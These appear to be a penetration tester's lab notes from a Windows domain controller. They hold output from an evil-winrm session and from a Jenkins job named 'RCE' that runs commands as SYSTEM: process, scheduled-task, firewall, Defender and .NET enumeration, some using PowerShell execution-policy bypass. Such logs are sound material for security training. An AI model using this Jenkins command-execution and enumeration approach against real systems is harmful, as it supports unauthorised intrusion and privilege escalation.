179 9 1724 11960 700 0 svchost
214 12 1956 9900 800 0 svchost
86 5 888 3900 832 0 svchost
924 20 6804 22228 856 0 svchost
868 20 5900 12756 900 0 svchost
261 10 2084 7932 940 0 svchost
216 9 2236 7704 1036 0 svchost
257 14 3264 9332 1068 0 svchost
407 14 14264 18840 1148 0 svchost
226 12 2764 12912 1200 1 svchost
184 10 2060 8984 1224 0 svchost
274 13 4048 11096 1236 0 svchost
371 18 5204 13376 1284 0 svchost
284 16 3272 12424 1304 0 svchost
403 32 9980 19108 1324 0 svchost
236 12 2600 11684 1340 0 svchost
253 14 3140 13960 1364 0 svchost
147 7 1204 5712 1400 0 svchost
440 9 2760 8992 1416 0 svchost
178 12 1792 8376 1540 0 svchost
334 10 2536 8596 1556 0 svchost
401 18 5160 14508 1564 0 svchost
316 13 2036 8968 1636 0 svchost
187 11 2060 12012 1696 0 svchost
161 9 1688 6892 1784 0 svchost
155 8 2164 7468 1820 0 svchost
224 12 2236 9316 1844 0 svchost
471 20 3484 12568 1880 0 svchost
394 15 13540 23200 1920 0 svchost
217 12 2048 7332 2040 0 svchost
222 10 2268 9168 2104 0 svchost
164 10 2032 7676 2376 0 svchost
289 21 3744 13736 2400 0 svchost
208 11 2376 8640 2556 0 svchost
164 9 4124 11904 2716 0 svchost
138 8 1480 6284 2808 0 svchost
231 14 4544 11940 2968 0 svchost
135 9 1672 6668 2976 0 svchost
176 11 2236 13580 2984 0 svchost
455 21 20884 35800 2992 0 svchost
168 12 3888 10828 3008 0 svchost
248 25 3532 12748 3016 0 svchost
143 7 1356 5796 3032 0 svchost
403 26 3552 13128 3276 0 svchost
373 19 5612 27832 3460 1 svchost
316 18 6844 23316 3908 0 svchost
167 9 3244 8008 4604 0 svchost
187 15 6048 10208 4740 0 svchost
168 11 2416 13240 4804 0 svchost
155 9 2004 6944 4836 0 svchost
331 16 17072 19120 6888 0 svchost
322 20 9472 15580 7064 0 svchost
1919 0 192 136 4 0 System
320 19 5772 14700 1828 1 taskhostw
213 20 4016 12568 4336 1 taskhostw
214 16 2392 10568 3560 0 vds
169 11 2924 10936 2896 0 VGAuthService
138 9 1796 7476 1140 1 vm3dservice
144 8 1708 7004 2876 0 vm3dservice
263 19 5268 1548 592 1 vmtoolsd
392 22 10592 22736 2888 0 vmtoolsd
173 11 1468 6708 480 0 wininit
281 12 2708 12660 544 1 winlogon
431 22 12036 25452 3732 0 WmiPrvSE
1086 38 79872 110048 5.22 5536 0 wsmprovhostexplorer
Processes (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins3001985331849935005.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>tasklist /svc
Image Name PID Services
========================= ======== ============================================
System Idle Process 0 N/A
System 4 N/A
Registry 88 N/A
smss.exe 288 N/A
csrss.exe 372 N/A
wininit.exe 480 N/A
csrss.exe 488 N/A
winlogon.exe 544 N/A
services.exe 620 N/A
lsass.exe 640 Kdc, KeyIso, Netlogon, SamSs
svchost.exe 832 PlugPlay
svchost.exe 856 BrokerInfrastructure, DcomLaunch, Power,
SystemEventsBroker
svchost.exe 900 RpcEptMapper, RpcSs
svchost.exe 940 LSM
dwm.exe 244 N/A
svchost.exe 308 nsi
svchost.exe 328 W32Time
svchost.exe 800 NcbService
svchost.exe 700 TimeBrokerSvc
svchost.exe 1036 Dhcp
svchost.exe 1068 Dnscache
svchost.exe 1148 EventLog
svchost.exe 1236 DsmSvc
svchost.exe 1284 NlaSvc
svchost.exe 1304 gpsvc
svchost.exe 1324 BFE, mpssvc
svchost.exe 1340 ProfSvc
svchost.exe 1400 Themes
svchost.exe 1416 EventSystem
svchost.exe 1540 SENS
svchost.exe 1556 netprofm
svchost.exe 1564 Schedule
svchost.exe 1636 Wcmsvc
svchost.exe 1696 ShellHWDetection
svchost.exe 1784 FontCache
svchost.exe 1820 WinHttpAutoProxySvc
svchost.exe 1844 LanmanWorkstation
svchost.exe 1920 Winmgmt
svchost.exe 1880 iphlpsvc
svchost.exe 2104 UserManager
svchost.exe 2376 PolicyAgent
svchost.exe 2556 LanmanServer
fontdrvhost.exe 2696 N/A
fontdrvhost.exe 2704 N/A
Microsoft.ActiveDirectory 2720 ADWS
svchost.exe 2808 SysMain
vm3dservice.exe 2876 vm3dservice
vmtoolsd.exe 2888 VMTools
VGAuthService.exe 2896 VGAuthService
svchost.exe 2968 W3SVC, WAS
svchost.exe 2976 SstpSvc
svchost.exe 2984 WpnService
svchost.exe 2992 DiagTrack
ismserv.exe 3000 IsmServ
svchost.exe 3008 AppHostSvc
svchost.exe 3016 CryptSvc
svchost.exe 3032 CoreMessagingRegistrar
dns.exe 3040 DNS
dfsrs.exe 2220 DFSR
svchost.exe 2400 WinRM
svchost.exe 2040 tapisrv
vm3dservice.exe 1140 N/A
dfssvc.exe 3108 Dfs
svchost.exe 3276 RasMan
vds.exe 3560 vds
dllhost.exe 3708 COMSysApp
WmiPrvSE.exe 3732 N/A
msdtc.exe 4008 MSDTC
svchost.exe 4836 lmhosts
sihost.exe 2336 N/A
svchost.exe 1200 CDPUserSvc_7b03f
svchost.exe 3460 WpnUserService_7b03f
taskhostw.exe 4336 N/A
svchost.exe 560 TokenBroker
cmd.exe 2328 N/A
svchost.exe 476 TabletInputService
cmd.exe 492 N/A
svchost.exe 2716 StateRepository
ctfmon.exe 4412 N/A
conhost.exe 1356 N/A
svchost.exe 1364 CDPSvc
conhost.exe 68 N/A
explorer.exe 5148 N/A
ShellExperienceHost.exe 5724 N/A
ServerManager.exe 5772 N/A
SearchUI.exe 5848 N/A
RuntimeBroker.exe 5924 N/A
RuntimeBroker.exe 6032 N/A
RuntimeBroker.exe 5280 N/A
jenkins.exe 5816 Jenkins
java.exe 5380 N/A
conhost.exe 5436 N/A
vmtoolsd.exe 592 N/A
svchost.exe 6888 DPS
svchost.exe 7064 UALSVC
svchost.exe 3908 UsoSvc
LogonUI.exe 3448 N/A
svchost.exe 4804 LicenseManager
svchost.exe 4740 DsSvc
svchost.exe 1224 StorSvc
taskhostw.exe 1828 N/A
svchost.exe 4604 PcaSvc
wsmprovhost.exe 5536 N/A
conhost.exe 5056 N/A
PING.EXE 4332 N/A
PING.EXE 6760 N/A
cmd.exe 1656 N/A
conhost.exe 4916 N/A
tasklist.exe 2112 N/A Tasks
*evil-winrm* ps c:\Users\oliver\Documents> cmd /c schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
cmd.exe : Access is denied.
+ categoryinfo : NotSpecified: (Access is denied.:String) [], RemoteException
+ fullyqualifiederrorid : NativeCommandError
*evil-winrm* ps c:\Users\oliver\Documents> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft TaskName,TaskPath,State
Cannot connect to CIM server. Access denied
at line:1 char:1
+ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*" } | ft ...
+ ~~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_ScheduledTask:String) [Get-ScheduledTask], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-ScheduledTaskTasks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins13166471713795385725.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>schtasks /QUERY /FO TABLE | findstr /v /i "\Microsoft" | findstr /v /i "access level" | findstr /v /i "system32"
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
Server Initial Configuration Task N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
.NET Framework NGEN v4.0.30319 N/A Ready
.NET Framework NGEN v4.0.30319 64 N/A Ready
.NET Framework NGEN v4.0.30319 64 Critic N/A Disabled
.NET Framework NGEN v4.0.30319 Critical N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management N/A Disabled
AD RMS Rights Policy Template Management N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
PolicyConverter N/A Disabled
VerifiedPublisherCertStoreCheck N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft Compatibility Appraiser 9/21/2023 3:24:53 AM Ready
ProgramDataUpdater N/A Ready
StartupAppTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
appuriverifierdaily N/A Ready
appuriverifierinstall N/A Ready
CleanupTemporaryState N/A Ready
DsSvcCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Pre-staged app cleanup N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
BitLocker Encrypt All Drives N/A Ready
BitLocker MDM policy Refresh N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UninstallDeviceTask N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
BgTaskRegistrationMaintenanceTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ProactiveScan N/A Ready
SyspartRepair N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
License Validation N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CreateObjectTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Consolidator 9/20/2023 12:00:00 PM Ready
UsbCeip N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Data Integrity Scan 9/25/2023 11:03:09 AM Ready
Data Integrity Scan for Crash Recovery N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ScheduledDefrag N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Device 9/21/2023 4:17:14 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Scheduled N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
DXGIAdapterCache N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SilentCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft-Windows-DiskDiagnosticDataColl N/A Disabled
Microsoft-Windows-DiskDiagnosticResolver N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Diagnostics N/A Ready
StorageSense N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
EDP App Launch Task N/A Ready
EDP Auth Task N/A Ready
StorageCardEncryption Task N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ExploitGuard MDM policy Refresh N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Property Definition Sync N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
ReconcileFeatures N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
RefreshCache 9/21/2023 2:53:30 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ScanForUpdates N/A Disabled
ScanForUpdatesAsUser N/A Disabled
SmartRetry N/A Disabled
WakeUpAndContinueUpdates N/A Disabled
WakeUpAndScanForUpdates N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TempSignedLicenseExchange N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Notifications N/A Ready
WindowsActionDialog N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
WinSAT N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
MapsToastTask N/A Disabled
MapsUpdateTask N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
ProcessMemoryDiagnosticEvents N/A Disabled
RunFullMemoryDiagnostic N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
MNO Metadata Parser N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SystemSoundsService N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
GatherNetworkInfo N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Background Synchronization N/A Disabled
Logon Synchronization N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Server Manager Performance Monitor N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Device Install Group Policy N/A Ready
Device Install Reboot Required N/A Ready
Sysprep Generalize Drivers N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
AnalyzeSystem N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
LoginCheck N/A Disabled
Registration N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
VerifyWinRE N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CleanupOldPerfLogs N/A Ready
ServerManager N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
StartComponentCleanup N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Account Cleanup N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
CreateObjectTask N/A Ready
IndexerAutomaticMaintenance N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Collection N/A Disabled
Configuration N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SpaceAgentTask N/A Ready
SpaceManagerTask N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
HeadsetButtonPress N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Storage Tiers Management Initialization N/A Ready
Storage Tiers Optimization N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
TaskName Next Run Time Status
======================================== ====================== ===============
MsCtfMonitor N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
ForceSynchronizeTime N/A Ready
SynchronizeTime N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
SynchronizeTimeZone N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UPnPHostConfig N/A Disabled
TaskName Next Run Time Status
======================================== ====================== ===============
Windows Defender Cache Maintenance N/A Ready
Windows Defender Cleanup N/A Ready
Windows Defender Verification N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
QueueReporting 9/20/2023 6:51:42 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
BfeOnServiceStartTypeChange N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
UpdateLibrary N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Calibration Loader N/A Ready
TaskName Next Run Time Status
======================================== ====================== ===============
Scheduled Start 9/21/2023 1:53:27 AM Ready
TaskName Next Run Time Status
======================================== ====================== ===============
CacheTask N/A Running
TaskName Next Run Time Status
======================================== ====================== ===============
Automatic-Device-Join N/A Ready
Recovery-Check N/A Disabled Firewall & AV
*evil-winrm* ps c:\Users\oliver\Documents> cmd /c netsh firewall show config ; Get-NetFirewallProfile | Format-Table Name, Enabled
domain profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
service configuration for domain profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
allowed programs configuration for domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
enable inbound remote mouse core / c:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
enable inbound remote mouse / c:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
port configuration for domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
standard profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
service configuration for standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Enable Yes Network Discovery
allowed programs configuration for standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
port configuration for standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
log configuration:
-------------------------------------------------------------------
file location = c:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Cannot connect to CIM server. Access denied
at line:1 char:37
+ cmd /c netsh firewall show config ; Get-NetFirewallProfile | Format-T ...
+ ~~~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_NetFirewallProfile:String) [Get-NetFirewallProfile], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-NetFirewallProfile*evil-winrm* ps c:\Users\oliver\Documents> Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath
Cannot connect to CIM server. Access denied
at line:1 char:1
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_MpComputerStatus:String) [Get-MpComputerStatus], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-MpComputerStatus
Cannot connect to CIM server. Access denied
at line:1 char:24
+ Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property Exc ...
+ ~~~~~~~~~~~~~~~~
+ categoryinfo : ResourceUnavailable: (MSFT_MpPreference:String) [Get-MpPreference], CimJobException
+ fullyqualifiederrorid : CimJob_BrokenCimSession,Get-MpPreferenceFirewall & AV (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins11098617683419096266.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>netsh firewall show config && powershell -ep bypass -c Get-NetFirewallRule -Enabled True -Action Block
Domain profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Domain profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Enable Inbound Remote Mouse Core / C:\Program Files (x86)\Remote Mouse\RemoteMouseCore.exe
Enable Inbound Remote Mouse / C:\Program Files (x86)\Remote Mouse\RemoteMouse.exe
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Standard profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Disable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No File and Printer Sharing
Enable Yes Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
Name : {D9E87628-9EE4-42D7-9D44-BD43476313DD}
DisplayName : BlockDCInbound
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Inbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : Local
Name : {D6399A8B-5E04-458F-AA68-62F64A4F1F43}
DisplayName : BlockOutboundDC
Description :
DisplayGroup :
Group :
Enabled : True
Profile : Any
Platform : {}
Direction : Outbound
Action : Block
EdgeTraversalPolicy : Block
LooseSourceMapping : False
LocalOnlyMapping : False
Owner :
PrimaryStatus : OK
Status : The rule was parsed successfully from the store. (65536)
EnforcementStatus : NotApplicable
PolicyStoreSource : PersistentStore
PolicyStoreSourceType : LocalBlockOutboundDC
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins9746192519689189053.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>powershell -ep bypass -nop -c "Get-MpComputerStatus ; Get-MpPreference | Select-Object -Property ExclusionPath"
AMEngineVersion : 0.0.0.0
AMProductVersion : 4.18.2109.6
AMRunningMode : Not running
AMServiceEnabled : False
AMServiceVersion : 0.0.0.0
AntispywareEnabled : False
AntispywareSignatureAge : 4294967295
AntispywareSignatureLastUpdated :
AntispywareSignatureVersion : 0.0.0.0
AntivirusEnabled : False
AntivirusSignatureAge : 4294967295
AntivirusSignatureLastUpdated :
AntivirusSignatureVersion : 0.0.0.0
BehaviorMonitorEnabled : False
ComputerID : B69A5725-131A-4485-A28F-47C70015EB96
ComputerState : 0
FullScanAge : 4294967295
FullScanEndTime :
FullScanStartTime :
IoavProtectionEnabled : False
IsTamperProtected : False
IsVirtualMachine : True
LastFullScanSource : 0
LastQuickScanSource : 0
NISEnabled : False
NISEngineVersion : 0.0.0.0
NISSignatureAge : 4294967295
NISSignatureLastUpdated :
NISSignatureVersion : 0.0.0.0
OnAccessProtectionEnabled : False
QuickScanAge : 4294967295
QuickScanEndTime :
QuickScanStartTime :
RealTimeProtectionEnabled : False
RealTimeScanDirection : 0
TamperProtectionSource : N/A
TDTMode : N/A
TDTStatus : N/A
TDTTelemetry : N/A
PSComputerName :
ExclusionPath : {N/A: Must be and administrator to view exclusions}AV is Disabled
Session Architecture
*evil-winrm* ps c:\Users\oliver\Documents> [Environment]::Is64BitProcess
TrueSession Architecture (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins3930728786260452138.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>powershell -ep bypass -c [Environment]::Is64BitProcess
TrueInstalled .NET Frameworks
*evil-winrm* ps c:\Users\oliver\Documents> cmd /c dir /A:D C:\Windows\Microsoft.NET\Framework ; cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" ; cmd /c reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
directory of c:\Windows\Microsoft.NET\Framework
09/15/2018 12:19 AM <DIR> .
09/15/2018 12:19 AM <DIR> ..
09/15/2018 12:19 AM <DIR> v1.0.3705
09/15/2018 12:19 AM <DIR> v1.1.4322
09/15/2018 12:19 AM <DIR> v2.0.50727
09/20/2023 02:04 AM <DIR> v4.0.30319
0 File(s) 0 bytes
6 Dir(s) 4,624,556,032 bytes free
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
HttpNamespaceReservationInstalled REG_DWORD 0x1
NetTcpPortSharingInstalled REG_DWORD 0x1
NonHttpActivationInstalled REG_DWORD 0x1
smsvchostpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
WMIInstalled REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
installpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
installpath reg_sz c:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
(Default) REG_SZ deprecated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
Install REG_DWORD 0x1
Version REG_SZ 4.0.0.0.NET 4.7.03190
Installed .NET Frameworks (Jenkins Security Context)
Started by remote host 10.10.16.5
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE
[RCE] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins13451945355414455822.bat
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\RCE>dir /A:D C:\Windows\Microsoft.NET\Framework && reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" && reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
Volume in drive C has no label.
Volume Serial Number is 212C-60B7
Directory of C:\Windows\Microsoft.NET\Framework
09/15/2018 12:19 AM <DIR> .
09/15/2018 12:19 AM <DIR> ..
09/15/2018 12:19 AM <DIR> v1.0.3705
09/15/2018 12:19 AM <DIR> v1.1.4322
09/15/2018 12:19 AM <DIR> v2.0.50727
09/20/2023 02:04 AM <DIR> v4.0.30319
0 File(s) 0 bytes
6 Dir(s) 4,624,556,032 bytes free
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\CDF\v4.0
HttpNamespaceReservationInstalled REG_DWORD 0x1
NetTcpPortSharingInstalled REG_DWORD 0x1
NonHttpActivationInstalled REG_DWORD 0x1
SMSvcHostPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
WMIInstalled REG_DWORD 0x1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Client\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
InstallPath REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4\Full\1033
CBS REG_DWORD 0x1
Install REG_DWORD 0x1
Release REG_DWORD 0x70bf6
Servicing REG_DWORD 0x0
TargetVersion REG_SZ 4.0.0
Version REG_SZ 4.7.03190
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0
(Default) REG_SZ deprecated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Net Framework Setup\NDP\v4.0\Client
Install REG_DWORD 0x1
Version REG_SZ 4.0.0.0